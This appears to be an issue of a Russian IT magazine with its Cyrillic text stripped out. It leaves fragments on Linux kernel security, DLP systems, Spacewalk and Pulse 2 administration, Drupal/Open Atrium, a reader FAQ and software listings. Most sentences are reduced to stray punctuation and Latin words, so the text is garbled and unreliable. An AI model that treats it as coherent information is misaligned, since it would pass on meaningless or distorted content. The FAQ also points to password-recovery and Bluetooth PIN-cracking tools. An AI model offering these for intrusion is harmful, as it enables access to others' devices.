( 2.6.36). .
TOMOYO AppArmor, . AppArmor
,
. , /bin/bash,
sshd, , .
SMACK (Simplified Mandatory Access Control Kernel) SELinux (
), .
, , :
, USB-.
IMA (Integrity Management Architecture) , ,
.
Address space layout randomization (ASLR) ,
.
.
Per-process securebits
, .

VARIOUS
:

: make nconfig ( , menuconfig) make
localmodconfig (
).
( memtest,
memtest
) kgdb.
Fanotify
, inotify dnotify,

.
, read() write().
LatencyTop
. z


SYN/ACK

aka 13oz

INFO


, Information
Security Policies Made
Easy
.

, ,
-152 (
), - ,

,
. , .

-

.
,
,
,

,
.
,


?
, ( , ?),
,
. :
(75+ ),
, - 1
. , ,
1 , RDP VPN. -
(
),
.
, , , ,
, -152 ,
, , . .



- .
, . ,
( ,
), .
? -, , , , ,
, /
.
:
,
,
, .
, :
1.
,
,
.
2. , , etc.
3. , . , ,
.
, (
,
), web- mail-, wsus,
VPN HQ ,
.
. .
, ,
.
, IP-,
,
.
,
, USB- ,

-,
,
. , . ,
,
. :
1. ,
, , , ,
. ,
, ,
, -
.
. ,
, .
2. . ,
. port security .
, - . 1,
, .
port security


( )
/, . , .
, , ,
,
, .
,
. ,

, ,
,
,

,
, (
IDS), .

:
, ,
. , , , : (
) ,
. , ...
, ,

,
,
, . . .
, , ,
USB-, ,
?.. .
,

, .

, . ?
, .
(

) ,
?

, . ,
, .

.
, -
: ,
.
,





, ,
.
, :
, ,
,
.

,
. , ,
, ,

,
.
, , - ,
. : ,
.
( ), DLP-.
, ,
, DLP
. , -,
: .
( ,
, ), - ,
, .
, DLP-
,
. , ,
,
. .
,
( ),
,
, , ,
(
), ,
.
Websense DSS.


. , , -
, , , ,
,
. , ,
,
,
.
, :
, . ,
.
,
, web- mail-.
,
DLP-

mail. , , ,
. , , ,
, ,
,
.

? -,
. :
- ,
.
-
. , ,
: - , -
. ,
.

- .
. . ,
. z


:
1. (-).
2. . .
3. Gray Hat Ethical Hackers Handbook.
, -
.
, .


SYN\ACK

grinder (grinder@tux.in.ua)

INFO
OCS
Inventory GLPI




][ 06.2010).



LINUX

Linux ,
.

-
( ),
,
,
, , .
,

Linux-.


WWW

Symbolic: opensymbolic.org
Func: fedorahosted.org/func
Cobbler: fedorahosted.org/cobbler
Certmaster: fedorahosted.org/certmaster
Smolt: smolt.fedoraproject.org
Pulse 2: pulse2.mandriva.org
Spacewalk: fedorahosted.org/spacewalk, spacewalk.redhat.com


SYMBOLIC
Linux ,
. , ,
(Kickstart, AutoYaST
JumpStart, PXE), (Cfengine, Puppet,
Func), bash. .
,
,
. .
-,
*nix. ,
, .

: SYMBOLIC!
Linux Symbolic (opensymbolic.org)
,
:
;
Bash, Perl,
Python, Groovy , ;


Symbolics

Pulse 2

LDAP, Kerberos,
Kerberos + LDAP (Active Directory) ;
VNC;
, , ;
RSS ( );
RedHat Application Stack,
- .

, 8081 (http://example.org:8081/symbolic).

Symbolic ( ).

, .
, Ajax. ,
, ,
.
. , RedHat/Fedora. Symbolic
,
: YUM, Func (fedorahosted.org/func), Cobbler
(fedorahosted.org/cobbler), Certmaster (fedorahosted.org/certmaster),
Smolt (smolt.fedoraproject.org). Smolt,
. ,
Puppet.
Symbolic Java. GNU GPL.
, OpenSource
, .
Symbolic Fedora,
. RPM-
Fedora RedHat.
Fedora 15 RedHat6/CentOS6
.

EPEL Extras.
( ) ,
, . , (
) Certmaster Func,
- . symbolic
symbolic-setup, . -


PULSE 2
RedHat
-. Mandriva , Pulse 2 (pulse2.mandriva.org),
100 . .
. Linux (RedHat/Mandriva/Debian/
Ubuntu), Mac OSX, HP-UX, IBM AIX, Solaris Windows 2k/XP/2k3/
Vista/2k8/Se7en ( x86). , ( Python,
PHP). Pulse 2 OpenSource-.
:
Pulse 2 OCS Inventory NG ( ][ 06.2010),

. ,
GLPI
(glpi-project.org).
Nagios. , ,
. Pulse 2
:
;
;

Pulse 2


Spacewalk


( );
,
;
VNC-;
;
;
.
1.3.0 Pulse 2 Linbox Rescue
Server ( Pulse 2 Imaging Server).
()
( Linux Windows) . SSH.

Inventory Proxy SSL.
Mandriva Directory Server (mds.mandriva.org). -,

Mandriva MMC (Mandriva Management Console).
, ,
,
.
.
ACL.
Community- , GNU GPL.
VMware Mandriva
Enterprise Server 5 Pulse 2 (
, ).
VMware 256 ,
512 , .
-,
IP- Pulse 2.
Linux .
LDAP MySQL. -
,
. ,
.


Spacewalk (fedorahosted.org/spacewalk, spacewalk.redhat.com) GPLv2 Red Hat Network


Satellite Server, 2001 . .


-, Linux.
, Satellite,
, RedHat.
, .
Satellite, Spacewalk RHEL/
Fedora, SLE/openSUSE Debian. .
(spacewalk.redhat.com/solaris) Solaris.
, Git . Spacewalk, :
;
Xen KVM;
;
;
Kickstart- AutoYaST;
, ;
;
;

.
Spacewalk - , , , .
-, ,
, . .
Spacewalk Proxy .
LDAP. LDAP
, LDIF-, . , , , CSV-.
, , .
,
PostgreSQL Oracle 10g Express Edition.

Oracle Satellite, PostgreSQL .

GOSA2
.
OpenSource- .
GOsa2 (oss.gonicus.de), -,
LDAP.

UNIX Samba, DHCP,
DNS, HTTP, SMTP , VoIP, .
GOsa
. 30 ,
GOsa: Squid, DansGuardian, rsyslog, Postfix, Courier-IMAP, Maildrop,
GNARWL, Cyrus-SASL, OpenSSL, Asterisk, Nagios, OPSI, Netatalk, FAI,
SOGo, OpenGroupware, Kolab, Scalix, ISC DHCP ( LDAP), WebDAV, PureFTPd, PPTP, Kerberos.


SPACEWALK
, , RedHat/CentOS/Fedora. ,
( Git) , . Debian .

, Fedora 15 Spacewalk :
# rpm -Uvh http://spacewalk.redhat.com/yum/1.5/Fedora/15/x86_64/spacewalk-repo-1.5-1.fc15.noarch.rpm
jpackage.
# cat > /etc/yum.repos.d/jpackage-generic.repo << EOF
[jpackage-generic]
name=JPackage generic
baseurl=http://mirrors.dotsrc.org/jpackage/5.0/generic/free/
enabled=1
gpgcheck=1
gpgkey=http://www.jpackage.org/jpackage.asc
EOF
SELinux:
# rpm -Uvh \
  'http://kojipkgs.fedoraproject.org/packages/selinux-policy/3.9.16/35.fc15/noarch/selinux-policy-targeted-3.9.16-35.fc15.noarch.rpm' \
  'http://kojipkgs.fedoraproject.org/packages/selinux-policy/3.9.16/35.fc15/noarch/selinux-policy-3.9.16-35.fc15.noarch.rpm'
.
, .
PostgreSQL. , Spacewalk
:
# yum install spacewalk-postgresql postgresql-server
PostgreSQL,
, :
# spacewalk-setup --disconnected
(,
), . , ( Wiki ),
spacewalk-setup.

GOsa2

Spacewalk
, .
, , , . , .
, ,
- .
.
, Spacewalk. ,
. ,
, .
, .
,
. , , . (
).
.
. , .
. rhn-*. Fedora 15 :
# rpm -Uvh http://spacewalk.redhat.com/yum/1.5/Fedora/15/x86_64/spacewalk-client-repo-1.5-1.fc15.noarch.rpm
# yum install rhn-client-tools rhn-check rhn-setup rhnsd m2crypto yum-rhn-plugin
Spacewalk
rhnreg_ks, URL
. :
# rhnreg_ks --serverUrl=http://example.org/XMLRPC \
--activationkey=<->
,
.

Spacewalk


, Linux-. , ? .
Spacewalk.
Pulse 2 . z


SYN/ACK

Spider_NET
Sp
(http://vr-online.ru)

Drupal

.
Drupal
( CMF),
.
, . Drupal
-,
.

VIDEO


,

.

ETHERNET-
, , -.
, . ,

, ,
.
, . ,
, :
1. .
.
.
.
. , ,
.
2. . : . ethernet .
.
3. . , Facebook,
, ,
. ,
, () .
.


Drupal

, ,
. .
( IT-),
.
8. .
. ,
. ,

.

Open Atrium

.
,
. (),
.

DRUPAL!
4.

5.

6.

7.

8.

, ,
.
+ -.

MS Exchange.
, .
- Exchange
. Exchange . ,

MS Exchange,
MS Outlook. ,
.
- web. ,
ethernet-,
, ,
ToDo-, /.
.
, . ,
. ,
,
( ) .
.
.
-, , , , , .
.
,
,
,
.
.
,
.
: , , , . .

. .
Help Desk. ,
IT-.
Ethernet-
IT- .


Drupal , .
,
. Drupal . -, , -
CMS ,
. Drupal ,
, .
, Drupal

. , . Drupal
, -

. Drupal .
.
,
,
Drupal.

DRUPAL
Drupal . Drupal ,
. ,
.
:
1. CMS Drupal. Drupal, drupal.org.

Drupal Commons


Dashboard Open Atrium

2. . / .
.
, . ,
.
3. . .
.

. / .
.
. , .
-
Google Calendar.
.
web-based-.
. ToDo-, ,
.
. .
.
Wiki.
/
. Wiki.
. Drupal -
... Drupal,
. OA
,
, , Drupal.

DRUPAL

OPEN ATRIUM
http://openatrium.com/
Open Atrium ,
. Open Atrium ,
. . , OA ,
-. OA Drupal, ,
Drupal
. OA
-.
OA . 2009 .,

. , OA
.
(1.0) .

. Open Atrium
.
: , wysiwyg-,
. .


,
, . Drupal,

drupal.org/project. ,
Open Atrium
.


Drupal
-. ,
Drupal. .
Conference Organizing Distribution (http://drupal.org/project/cod)
. ,
,
. , Drupal LA, Drupal
Kiev Camp.
Array Shift (http://drupal.org/project/arrayshift)
stackoverflow.com.
, .
Drupal Social Network framework (http://drupal.org/project/dsnf_install)
,
.
,
.
DrupalBin (http://drupal.org/project/drupalbin) , /
. .
.
ELMS (http://drupal.org/project/elms)
(
, . .).
.
eRecruiter (http://drupal.org/project/recruiter)
, . , -,
.
.
Single-use blog (http://drupal.org/project/single_user_blog)
.
WordPress.


Drupal

. GCalendar?

-.
,
( ).
OA , .

Open Atrium .
,
. ,
-. OA
.

. .
,
/ .
,
. , .
.
.
OA, , .
, . . .

.
: 8/10.

DRUPAL COMMONS
http://acquia.com/downloads
Drupal Commons .

.
-. , Drupal Commons
. DC. Open
Atrium, DC
Acquia.
Drupal. , Drupal, Open Scholar, Acquia Drupal, OpenPublish.

. , Microsoft Acquia.

. . ,
.
/.
Wiki.
.
.

Drupal.
.
, DC- .
.
.
: 5/10.

Drupal Commons


Drupal . Drupal . Drupal


,
, CMS ,
(-
) . . ,
.
Drupal.
-, ( ), . z


UNITS / FAQ UNITED

FAQ United


FAQ@REAL.XAKEP.RU


OPENWRT, , ,
.
, -
4 .
,
,

(
)?



, .
OpenWRT (openwrt.org)
Image
Generator (bit.ly/oWxmJd),
firmware.
,
,
.

PPTP/L2TP. ?



( ).
,
,
,
.

,
RouterPassView (www.nirsoft.net/utils/router_password_recovery.html).
,
Grab Password
From IE Window. ,
Internet Explorer.

WI-FI,
. ,
?


,
, .
,
, ChilliSpot (www.chillispot.info). ?

- , Chillispot DNS- ,
.
,
. RADIUS-
( FreeRadius www.freeradius.org).

, ChilliSpot .
Linux-.


FIREFOX,

-
. - ?
Firefox .
, - ,
. Firefox
: ,
4.0 ( ),
6.0.2 . :
1. , .xpi- (

Firefox) zip-. ,
.
2. install.rdf targetApplication:

<em:targetApplication>
  <Description>
    <em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id>
    <em:minVersion>4.0</em:minVersion>
    <em:maxVersion>5.0</em:maxVersion>
  </Description>
</em:targetApplication>
,
minVersion maxVersion.
3. zip- .xpi.

Nightly Tester Tools (bit.ly/pwWh7c).

5 :
,
. -

.
( nmap:
nmap -sL 146.187.130.0/24), ,
.
?


, ,

. SNMP-,
( traceroute),
.
, .

LanTopolog (www.lantopolog.com/rus).
,
,
SNMP.
. !



-
,
.

TOR
LINUX. :
TORIFY
(TORIFY FIREFOX) TORSOCKS (TORSOCKS
FIREFOX). .
?

, -,
, ( ), , ,
.
, EDGE-, GPRS-, 3G-,
. ,

( - . .). XCode (developer.apple.com/technologies/tools),
iPhone/iPad, . Network Link Conditioner
. Windows
SoftPerfect Connection Emulator (www.softperfect.com): ,
. TMnetSim Network Simulator (www.tmurgent.com/tools.aspx). , ( , ) GUI. (, SQL Server).
WANem (wanem.sourceforge.net).
Knoppix LiveCD-,
-. LiveCD ,
(, VirtualBox) .

torsocks,
DNS-
,
.

, , ,
. ,
?


TOR?

1. GUI-
Tor Vidalia.
2. Settings Services.
3. Virtual Port,
Target Directory Path. , :

Virtual Port: 80
Target: 127.0.0.1:80 or just 127.0.0.1
Directory Path: c:\torhs or /home/username/torhs
4. ,
Service .onion- ,
.



AMAZON S3?

,
Amazon
AWS Free Usage Tier (aws.amazon.com/free), S3 . ,
.
Windows.
,
Amazon S3. ,
( CloudBerry Online
Backup, www.cloudberrylab.com).

Nmap (nmap.org).


. GUI- Zenmap
.
----traceroute.


Network Link Conditioner


: , 3G . ,
,

rumint (rumint.org).
, , .

PCAP .
.

NetCrunch (www.adremsoft.com).

IP-, , ,
,
. !


CloudBerry Online Backup Amazon S3

, , , -
, Bonkey
(thebackupmonkey.blogspot.com).
Linux.
s3- s3cmd.
Ubuntu
(
: apt-get install s3cmd). , ,
,
S3,
: s3cmd --configure.
, ,

. , s3cmd
rsync:
s3cmd --acl-private --bucket-location=EU --guess-mime-type --delete-removed sync /local/backup/ s3://xakep/backupfromserv1
cron ,
( - Amazon
).
,
?
:
s3cmd sync s3://xakep/backupfromserv1 /local/backup/


Q , . (
)

. ?


forensics-. ,
, OWADE (OFFLINE
WINDOWS Analyzer and Data Extractor, bitbucket.org/Elie/owade). Python,

RouterPassView ,
Linux
Windows. (./main.py) 8080-
(http://
localhost:8080/owade),

.


BLUETOOTH.
PIN-
(BLUETOOTH PASS PHRASE).
, ?


BTCrack.
(bit.ly/oKWbij),
Linux (bit.ly/qHkCoQ).
,
,

( , ,
). Bluetooth
,
,
.


PYTHON.
?


Beautiful Soup (www.crummy.com/software/BeautifulSoup), lxml (lxml.de), scrapy (scrapy.org).
Grab (bitbucket.org/lorien/grab),
.

(bit.ly/p9Srxf):
(cookies,
http-, POST/GET-);
(
HTTP/SOCKS-);
( ,

cookies, ,
);
DOM-
( HTML-);
(,
);
: ,
.

,
xakep Google
10 :
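from grab import Grab

g = Grab()
g.go('http://www.google.ru')   # load the search page
g.set_input('q', 'xakep')      # fill in the query field
g.submit()                     # submit the search form
# print the link and title of each result on the page
for elem in g.itercss('#rso li h3 a'):
    print(u'%s | %s' % (elem.get('href'), elem.text_content().strip()))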

,


. ,

.
,

( ).
FEDORA.

Sagan (sagan.quadrantsec.com).



IDS- Snort.
,
oinkmaster (oinkmaster.sourceforge.net) pulledpork (code.google.com/p/pulledpork). , Snort , Sagan
. z


>Net
Cyberduck 4.1.2
DynaMAC 2011-08-31
Fiddler2
G+7 1.2.0.0
LinkChecker 7.1
Miranda IM 0.9.30
MTPuTTY 1.0 Beta
NetworkTrafficView 1.00

>Multimedia\
AIMP 2.61 Build 583
FastPreview 3.1
FastStone Image Viewer 4.6
GOM Player 2.1.33.5071
Graphs Made Easy 3.1
Juice
Lightshot 1.4
Open Freely
Paint.NET 3.5.8
Snaplr
VisualSubSync 1.0.0
ZS4 Video Editor 0.958

>Misc
4t Tray Minimizer Free 5.52
8start Launcher 3.0
Autosensitivity 1.4
Better Directory Analyzer 1.0
Bins
EyeLeo 1.1
FastPreview
FileMindQuickFix 1.0
Gest 2.3.0
HotkeyP
LightShot 1.4.0
Microsoft Mathematics 4.0
Mouse Without Borders
Prey 0.5.3
SuperCopier 2.2 Beta
TouchFreeze 1.0.2

>>WINDOWS
>Development
Beyond Compare 3
DiffMerge 3.3.1
DPack v3.0.13
DreamCoder for MySQL 6.0
DreamCoder for Oracle 6.0
DreamCoder for PostgreSQL 6.0
EmEditor Free 6.00.4
EmEditor Professional 10.1.1
GhostDoc 3.0
HelpNDoc
IOGraph 0.9
NUnit 2.5.10
OdoPlus 1.6
PostgreSQL 9.1
ReSharper 6.0
StyleCop 4.5
TestDriven.NET 3.1.2759 Beta
Visual Assist X 10.6
Visual Paradigm for UML 8.2
Community Edition
VisualSVN 2.0.6
VisualSVN Server 2.1.10
XRefresh 1.5

>>UNIX
>Desktop
Clex 4.6
Converseen 0.4.3
Double Commander 0.5.0
Genius 1.0.14
Gnac 0.2.3
GTKRawGallery 0.9.61
jHepWork 3.1
Jomic 0.9.33
Kwave 0.8.6
Mplayer tools 7.8
QtiPlot 0.9.8.8
Qucs 0.0.16
Recoll 1.15.8
Shotwell 0.11
Tovid 0.34

>System
Bluetooth Driver Installer 1.0.0.72
Boot-US 2.1.8
CCleaner 3.10
Check Disk GUI
Comodo System-Cleaner 3.0.17
Crucial System Scanner
Defraggler 2.06
Disk Bench 2.6.1.0
ERUNTgui 1.3.0
HWiNFO
Malwarebytes Anti-Malware
1.51.2.1300
Minimem 2.0
Moo0 SystemMonitor 1.64
Recuva 1.40
Secunia PSI 2.0
Speccy 1.12.265
SSDlife Free 2.1.29
USB Monitor
VirtualBox 4.1.2
Web Log Storming

> Security
Agnitio v2
AVZ 4.35
Cryptohaze Multiforcer 1.0
HashGenerator 1.0
INSECT Pro 2.6.1
ldap-blind-explorer
MoonSols DumpIt
pev 0.40
SIP Inspector 1.34
theHarvester 2.1 Blackhat Edition
TrueCrypt 7.1
WebInject 1.41
WFuzz 2.0
WPScan WordPress Security
Tool 1.0
xpath-blind-explorer
ZAP 1.3.2

SFTP Net Drive 1.0.12


ShareScan 1.0.0.2
VPN Watcher
WakeMeOnLan v1.10
Website Load Tool 1.0
York 1.50

>Security
Aide 0.15.1
Arachni 0.3
Armitage 09.08.11
Bastille 3.2.1
FBPwn 0.1.3
Lshell 0.9.14
Malheur 0.5.2
Megiddo 0.4.0
Mobius Forensic Toolkit 0.5.9
Nixory 1.1
Suricata 1.0.5
T50 5.4
Trojan scan 1.4.1
TrueCrypt 7.1
UnHash 1.1
Websecurify 0.8
Wireshark 1.6.2
Xfprot 2.4
aidsql
APKInspector BETA
Cryptohaze Multiforcer 1.0

>Net
Adobe Flash Player 10.3.181.22
BaGoMa 1.10
BitlBee 3.0.3
Cone 0.89
Creepy
Google Chrome 13
gPodder 2.13
JFBChat 0.2.2
LinkChecker 7.1
Linphone 3.4.3
Mozilla Firefox 6.0.2
NetworkManager 0.9
Opera 11.51
Qt Cloud Drive
quIRC 0.7.11
Tyrs 0.4.0
Wget 1.13
Xymon Alert 4.3.4

>Devel
Collabtive 0.7
Database Deployment Manager
0.1e
DBeaver 1.3.4
dbm 1.9
Dhex 0.65
diffutils 3.1
GDB 7.3a
IPython 0.11
JFormDesigner 5
JPPF 2.5.2
MetaModel 2.0
MyJgui 0.7.4.1
PyPy 1.6
Qt Creator 2.3
Rails 3.1
RKWard 0.5.6
Shogun 1.0.0
Vaadin 6.6.6

Veusz 1.13
Videotrans 1.6.1
XPaint 2.9.8.2

>>MAC
Adium 1.4.3
Android SDK 3.0r12
ClamXav 2.2.2
DesktopUtility 1.2.2
Firebird 2.1.4
FreeCol 0.10.2
FunctionFlip 2.2
GeoGebra 4.0
Lion Tweaks 1.3
Mac Games Arcade 1.7.7
MAMP 2.0.3
OpenSSH 5.9
Python 3.2.2
Parallels Desktop 7 Mac
RedQuits 2.0
Skitch 1.0.7
SMARTReporter 2.7.0
SSH Tunnel Manager 2.1.4
TrueCrypt 7.1
Tubbler 1.3.1
TVShows 2.0b11

>X-distr
Chrome OS 1.5.849
Mandriva Linux 2011.0

>System
Apt-dater 0.8.5
AQEMU 0.8.1
Arkeia 9
BleachBit 0.9.0
Ccfe 1.51
Collectd 5.0.0
eMount 0.11.2
Extcarve 1.1
G4L 0.38
Giis-ext4 0.7
HDT 0.5.0
OSS 4
QEMU 0.15
Tvpvrd 3.3.2

>Server
ABillS 0.53
Apache 2.2.20
Ashd 0.8
MUSCLE 5.56
MySQL 5.5.15
OpenLDAP 2.4.26
OpenSSH 5.9
OpenVPN 2.2.1
Postfix 2.8.5
PostgreSQL 9.0.4
Samba 3.6.0
Sendmail 8.14.5

fuzzdb 1.09
hashkill 0.2.4
Malheur 0.5.1
peter-bochs
pev 0.40
SIP Inspector 1.34
slowhttptest 1.1
Snort 2.9.1
TrueCrypt 7.1
Wfuzz 2.0


UNITS /

Lockpicking


,

.

,
.

2
,
.

,
. . .

-

,



. ,


:
,
.

:
-,

-.
,

:
, -

.



,

.
,

.
